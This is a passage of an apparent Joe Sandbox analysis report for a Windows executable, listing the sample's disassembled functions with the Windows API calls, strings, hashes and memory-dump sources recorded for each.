LoadStringW.USER32(00000000), ref: 003C4336
_wprintf.LIBCMT ref: 003C435C
MessageBoxW.USER32(00000000,?,?,00011010), ref: 003C437A

Strings

%s (%d) : ==> %s: %s %s, xrefs: 003C4357

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: HandleLoadModuleString$Message_wprintf
String ID: %s (%d) : ==> %s: %s %s
API String ID: 3648134473-3128320259
Opcode ID: 1007d4d48f3720007a41e954458e8c75ab12fabac36463c89126258c695c3138
Instruction ID: 24e5db4edace00c3725a56904dff37f19fa25064d66af580412674abf0da658c
Opcode Fuzzy Hash: 1007d4d48f3720007a41e954458e8c75ab12fabac36463c89126258c695c3138
Instruction Fuzzy Hash: DD0167F690024CBFD762A790DD89FE6777CD708700F0005A5BB45E6051EA745E854B74

Function 003ED43E Relevance: 12.3, APIs: 8, Instructions: 257windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00362612: GetWindowLongW.USER32(?,000000EB), ref: 00362623

GetSystemMetrics.USER32(0000000F), ref: 003ED47C
GetSystemMetrics.USER32(0000000F), ref: 003ED49C
MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 003ED6D7
SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 003ED6F5
SendMessageW.USER32(00000003,00000469,?,00000000), ref: 003ED716
ShowWindow.USER32(00000003,00000000), ref: 003ED735
InvalidateRect.USER32(?,00000000,00000001), ref: 003ED75A
DefDlgProcW.USER32(?,00000005,?,?), ref: 003ED77D

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
String ID:
API String ID: 1211466189-0
Opcode ID: 851089de008dee099de00ece473294a8ccd360c2129ea44a8efbe83146911f72
Instruction ID: 2a413346d35eeca90889360edac915c5b765af03a68fb6909673bd991e1d4dbc
Opcode Fuzzy Hash: 851089de008dee099de00ece473294a8ccd360c2129ea44a8efbe83146911f72
Instruction Fuzzy Hash: 99B19935600269EFDF26CF6AC9C57AD7BB1BF04701F098269EC489E2D5D770A950CB90

Function 00362A5B Relevance: 12.1, APIs: 8, Instructions: 129COMMON

Download Yara Rule

APIs

ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0039C1C7,00000004,00000000,00000000,00000000), ref: 00362ACF
ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,0039C1C7,00000004,00000000,00000000,00000000,000000FF), ref: 00362B17
ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,0039C1C7,00000004,00000000,00000000,00000000), ref: 0039C21A
ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0039C1C7,00000004,00000000,00000000,00000000), ref: 0039C286

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: ShowWindow
String ID:
API String ID: 1268545403-0
Opcode ID: b186b17c1d9d8be8e1e03d2218935eecbeaf5ad2261495b216d24398a839db45
Instruction ID: 439a4c3cca785eeda220a9d33cb1249339b6ba0ea8c803c755adf084a0679d89
Opcode Fuzzy Hash: b186b17c1d9d8be8e1e03d2218935eecbeaf5ad2261495b216d24398a839db45
Instruction Fuzzy Hash: 9E41E931A18FC09ACB379B68DC88B7B7B99AB45310F57C91DE0874B9A5CAB19841E710

Function 003C70C6 Relevance: 12.1, APIs: 8, Instructions: 101fileCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,000001F5), ref: 003C70DD

Part of subcall function 00380DB6: std::exception::exception.LIBCMT ref: 00380DEC
Part of subcall function 00380DB6: __CxxThrowException@8.LIBCMT ref: 00380E01

ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 003C7114
EnterCriticalSection.KERNEL32(?), ref: 003C7130
_memmove.LIBCMT ref: 003C717E
_memmove.LIBCMT ref: 003C719B
LeaveCriticalSection.KERNEL32(?), ref: 003C71AA
ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 003C71BF
InterlockedExchange.KERNEL32(?,000001F6), ref: 003C71DE

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
String ID:
API String ID: 256516436-0
Opcode ID: b767c9c59e984b029f0c88fc5d3152e2ebe5a596263552255304ff6b81f91a6f
Instruction ID: 48368c320dd152838d2b3c3fdfb8e0eaa79ea8c6882c4d19071ebc4b0e694807
Opcode Fuzzy Hash: b767c9c59e984b029f0c88fc5d3152e2ebe5a596263552255304ff6b81f91a6f
Instruction Fuzzy Hash: D8316D35900205EFCB51EFA4DC85AABB778EF45310F1581A9E9049F296DB70AE14CB60

Function 003E61D3 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 003E61EB
GetDC.USER32(00000000), ref: 003E61F3
GetDeviceCaps.GDI32(00000000,0000005A), ref: 003E61FE
ReleaseDC.USER32(00000000,00000000), ref: 003E620A
CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 003E6246
SendMessageW.USER32(?,00000030,00000000,00000001), ref: 003E6257
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,003E902A,?,?,000000FF,00000000,?,000000FF,?), ref: 003E6291
SendMessageW.USER32(?,00000142,00000000,00000000), ref: 003E62B1

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
String ID:
API String ID: 3864802216-0
Opcode ID: 8be9614a55d6f17864d0ba245b0022ee90b5aab37154f7b31ae575e6973bb1fb
Instruction ID: a330080a731f490062b9f72b6b40304226fa6b7a733746694c9aa5700dca0eb4
Opcode Fuzzy Hash: 8be9614a55d6f17864d0ba245b0022ee90b5aab37154f7b31ae575e6973bb1fb
Instruction Fuzzy Hash: 0D317C72100260AFEB228F518C8AFEA3BADEF59761F054165FE089E2D1C6B59C41CB60

Function 003BBBAF Relevance: 12.1, APIs: 8, Instructions: 92COMMON

Download Yara Rule

APIs

_memcmp.LIBCMT ref: 003BBBC4
_memcmp.LIBCMT ref: 003BBBE6
_memcmp.LIBCMT ref: 003BBBFE
_memcmp.LIBCMT ref: 003BBC11
_memcmp.LIBCMT ref: 003BBC2B
_memcmp.LIBCMT ref: 003BBC3E
_memcmp.LIBCMT ref: 003BBC56
_memcmp.LIBCMT ref: 003BBC71

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: f69ae3acb0a5b27b103ebd8699b427170c7fe35ee8307913a679e5f27cfc8eba
Instruction ID: a071b21bf9563a8b2a43030591ffdebb50e6de9bc22695d8f5ded941bcbde9f1
Opcode Fuzzy Hash: f69ae3acb0a5b27b103ebd8699b427170c7fe35ee8307913a679e5f27cfc8eba
Instruction Fuzzy Hash: D3214162601609BBE607B7129D42FFBB76D9E1038CB054060FF059AE47EFD4DE1182A1

Function 003CEB23 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 323COMMON

Download Yara Rule

APIs

Part of subcall function 00369837: __itow.LIBCMT ref: 00369862
Part of subcall function 00369837: __swprintf.LIBCMT ref: 003698AC

Part of subcall function 0037FC86: _wcscpy.LIBCMT ref: 0037FCA9

_wcstok.LIBCMT ref: 003CEC94
_wcscpy.LIBCMT ref: 003CED23
_memset.LIBCMT ref: 003CED56

Strings

X, xrefs: 003CED93

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: _wcscpy$__itow__swprintf_memset_wcstok
String ID: X
API String ID: 774024439-3081909835
Opcode ID: ba81cfdbb8c44983326a8c89d4826cd194f9fa6d2732bfee79f0d06f1a34fdc5
Instruction ID: 6eefa25d1fdd9a268710ceb0a7e89d8e716c0afde9c479b288380d4832490732
Opcode Fuzzy Hash: ba81cfdbb8c44983326a8c89d4826cd194f9fa6d2732bfee79f0d06f1a34fdc5
Instruction Fuzzy Hash: ECC16E715083419FC766EF64C885F5AB7E4AF85314F01892DF899DB2A2DB70EC45CB82

Function 003D6B03 Relevance: 10.8, APIs: 7, Instructions: 250networkCOMMON

Download Yara Rule

APIs

__WSAFDIsSet.WSOCK32(00000000,?), ref: 003D6C00
#17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 003D6C21
WSAGetLastError.WSOCK32(00000000), ref: 003D6C34
htons.WSOCK32(?), ref: 003D6CEA
inet_ntoa.WSOCK32(?), ref: 003D6CA7

Part of subcall function 003BA7E9: _strlen.LIBCMT ref: 003BA7F3
Part of subcall function 003BA7E9: _memmove.LIBCMT ref: 003BA815

_strlen.LIBCMT ref: 003D6D44
_memmove.LIBCMT ref: 003D6DAD

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
String ID:
API String ID: 3619996494-0
Opcode ID: fbf93b9af05a4ecc9432adf48c3e927bbbc3d945213343957dbe44dd2d861cdb
Instruction ID: b77961d5f9c4d556d7f88dceffc8bffc471303d5060eeae6ce9f5c6c1c09b74b
Opcode Fuzzy Hash: fbf93b9af05a4ecc9432adf48c3e927bbbc3d945213343957dbe44dd2d861cdb
Instruction Fuzzy Hash: D781A172204300ABC712EB64EC92F6AB7EDAF94714F108A1EF5659F292DB70ED05CB51

Function 00361424 Relevance: 10.7, APIs: 7, Instructions: 219COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d94f15b393ff3d816b6dc148c999a323d7ddcb24c7fa3d1af4c225a349371697
Instruction ID: 706b90bc3dfb7cb46fc722ce3c0b18fbda64366b3e52eb45b3c86ac55dcbdbf8
Opcode Fuzzy Hash: d94f15b393ff3d816b6dc148c999a323d7ddcb24c7fa3d1af4c225a349371697
Instruction Fuzzy Hash: 44717D30900109EFCB16CF99CC89ABEBB79FF85310F19C259F915AB255C770AA51CB60

Function 003EB351 Relevance: 10.7, APIs: 7, Instructions: 199windowCOMMON

Download Yara Rule

APIs

IsWindow.USER32(00E0CFA0), ref: 003EB3EB
IsWindowEnabled.USER32(00E0CFA0), ref: 003EB3F7
SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 003EB4DB
SendMessageW.USER32(00E0CFA0,000000B0,?,?), ref: 003EB512
IsDlgButtonChecked.USER32(?,?), ref: 003EB54F
GetWindowLongW.USER32(00E0CFA0,000000EC), ref: 003EB571
SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 003EB589

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: MessageSendWindow$ButtonCheckedEnabledLong
String ID:
API String ID: 4072528602-0
Opcode ID: b5842d38cc0b429648642247fb33e928f9fa8a947b1308bc2880c93514c9009b
Instruction ID: bf6cffbe150812b1b1a0c0d27be1e129cff9be9121a846c6c4e329ea8120c855
Opcode Fuzzy Hash: b5842d38cc0b429648642247fb33e928f9fa8a947b1308bc2880c93514c9009b
Instruction Fuzzy Hash: 9F718B346042A4AFDB239F56C8D1FBBBBA9EF09300F154269E945972E2C771A940CF50

Function 003DF41E Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 177COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 003DF448
_memset.LIBCMT ref: 003DF511
ShellExecuteExW.SHELL32(?), ref: 003DF556

Part of subcall function 00369837: __itow.LIBCMT ref: 00369862
Part of subcall function 00369837: __swprintf.LIBCMT ref: 003698AC

Part of subcall function 0037FC86: _wcscpy.LIBCMT ref: 0037FCA9

GetProcessId.KERNEL32(00000000), ref: 003DF5CD
CloseHandle.KERNEL32(00000000), ref: 003DF5FC

Strings

@, xrefs: 003DF525

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
String ID: @
API String ID: 3522835683-2766056989
Opcode ID: bafd76aa0d0ebd2e895e7b7d0bfa2565f32d1844268f55904f8de45047c88d2d
Instruction ID: bcdc562b8757cc9a55dcf18d39128c73721026ea235b7ff3edbe93303d6358ff
Opcode Fuzzy Hash: bafd76aa0d0ebd2e895e7b7d0bfa2565f32d1844268f55904f8de45047c88d2d
Instruction Fuzzy Hash: DC619075A00619DFCF16EFA4D4819AEBBF5FF49314F14806AE85AAB351CB30AD41CB90

Function 003C0F4D Relevance: 10.7, APIs: 7, Instructions: 166windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 003C0F8C
GetKeyboardState.USER32(?), ref: 003C0FA1
SetKeyboardState.USER32(?), ref: 003C1002
PostMessageW.USER32(?,00000101,00000010,?), ref: 003C1030
PostMessageW.USER32(?,00000101,00000011,?), ref: 003C104F
PostMessageW.USER32(?,00000101,00000012,?), ref: 003C1095
PostMessageW.USER32(?,00000101,0000005B,?), ref: 003C10B8

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: 187a6f7e707e9b19b4a42bec78dabf2ee2638f6df6c2e42e849974d2e736f087
Instruction ID: c8625fc1d9ed665f6f0e49ad284bb040297aea92aaffaf250131cadc1a9e4352
Opcode Fuzzy Hash: 187a6f7e707e9b19b4a42bec78dabf2ee2638f6df6c2e42e849974d2e736f087
Instruction Fuzzy Hash: 7651CFA05046D57DFB3742348C55FBABEA96B07304F09858DE1D4CA8D3C2D9ACD8E751

Function 003C0D66 Relevance: 10.7, APIs: 7, Instructions: 165windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(00000000), ref: 003C0DA5
GetKeyboardState.USER32(?), ref: 003C0DBA
SetKeyboardState.USER32(?), ref: 003C0E1B
PostMessageW.USER32(00000000,00000100,00000010,?), ref: 003C0E47
PostMessageW.USER32(00000000,00000100,00000011,?), ref: 003C0E64
PostMessageW.USER32(00000000,00000100,00000012,?), ref: 003C0EA8
PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 003C0EC9

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: 153ff2766004976dec29a969f68c4d34128b2767c58521d885998223fc31581c
Instruction ID: 2f009db5b477ad21b6e93d35450907194b5f3e92229310a909daf833d3e7a168
Opcode Fuzzy Hash: 153ff2766004976dec29a969f68c4d34128b2767c58521d885998223fc31581c
Instruction Fuzzy Hash: 2A5105A0544BD5BDFB3B83748C55F7ABEA95B06300F08898DE1D5DA8C3C395AC88E760

Function 003C55FD Relevance: 10.6, APIs: 7, Instructions: 138timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32 ref: 003C560A
_wcsncpy.LIBCMT ref: 003C563F
_wcsncpy.LIBCMT ref: 003C5671
_wcsncpy.LIBCMT ref: 003C56A4
_wcsncpy.LIBCMT ref: 003C56E6
_wcsncpy.LIBCMT ref: 003C5720
_wcsncpy.LIBCMT ref: 003C574F

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: _wcsncpy$LocalTime
String ID:
API String ID: 2945705084-0
Opcode ID: 181e2463982d6bfe5539de2334fe06f256dce4e15838f9a9234b8a53ff9cf96e
Instruction ID: add3ac2ef1f3c15f229b22168e4957a07f960fa1781d0cc4e557a637d3856c08
Opcode Fuzzy Hash: 181e2463982d6bfe5539de2334fe06f256dce4e15838f9a9234b8a53ff9cf96e
Instruction Fuzzy Hash: 91417375C1171876CB13FBF48C86ACFB3B89F05310F508996E918E7221EB34A695C7A6

Function 003BD56C Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 121comlibraryloaderCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 003BD5D4
SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 003BD60A
GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 003BD61B
SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 003BD69D

Strings

,,?, xrefs: 003BD578
DllGetClassObject, xrefs: 003BD610

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: ErrorMode$AddressCreateInstanceProc
String ID: ,,?$DllGetClassObject
API String ID: 753597075-2169313111
Opcode ID: a0aec1666e6d1213ebbcbe5ca786efcda7d304b8e2bc700e2ad1b45d814eb6c8
Instruction ID: f59c35df17f43520a46ec7f7df7f63a045b3479666a66c51b8174c56bf1f1195
Opcode Fuzzy Hash: a0aec1666e6d1213ebbcbe5ca786efcda7d304b8e2bc700e2ad1b45d814eb6c8
Instruction Fuzzy Hash: 9C4192B5600204EFDB16CF54C884BDABBB9EF44318F1581A9EE099F645E7B1DD40CBA0

Function 003C3671 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 111filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 003C466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,003C3697,?), ref: 003C468B

Part of subcall function 003C466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,003C3697,?), ref: 003C46A4

lstrcmpiW.KERNEL32(?,?), ref: 003C36B7
_wcscmp.LIBCMT ref: 003C36D3
MoveFileW.KERNEL32(?,?), ref: 003C36EB
_wcscat.LIBCMT ref: 003C3733
SHFileOperationW.SHELL32(?), ref: 003C379F

Strings

\*.*, xrefs: 003C372D

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
String ID: \*.*
API String ID: 1377345388-1173974218
Opcode ID: c6af9a79f1d2a76d5f57a99b496816427fcfd4e1a4bf919b1f68da7e43602877
Instruction ID: d02c9fef834dc5e23815ae17e19230bae08037f65c784b700c66a5e9dc7b7fad
Opcode Fuzzy Hash: c6af9a79f1d2a76d5f57a99b496816427fcfd4e1a4bf919b1f68da7e43602877
Instruction Fuzzy Hash: 4A417FB1508344AEC753EF64C891EDF77ECAF89340F00496EB499C7251EA34DA89C756

Function 003E7291 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 103windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 003E72AA
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 003E7351
IsMenu.USER32(?), ref: 003E7369
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 003E73B1
DrawMenuBar.USER32 ref: 003E73C4

Strings

0, xrefs: 003E729E

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

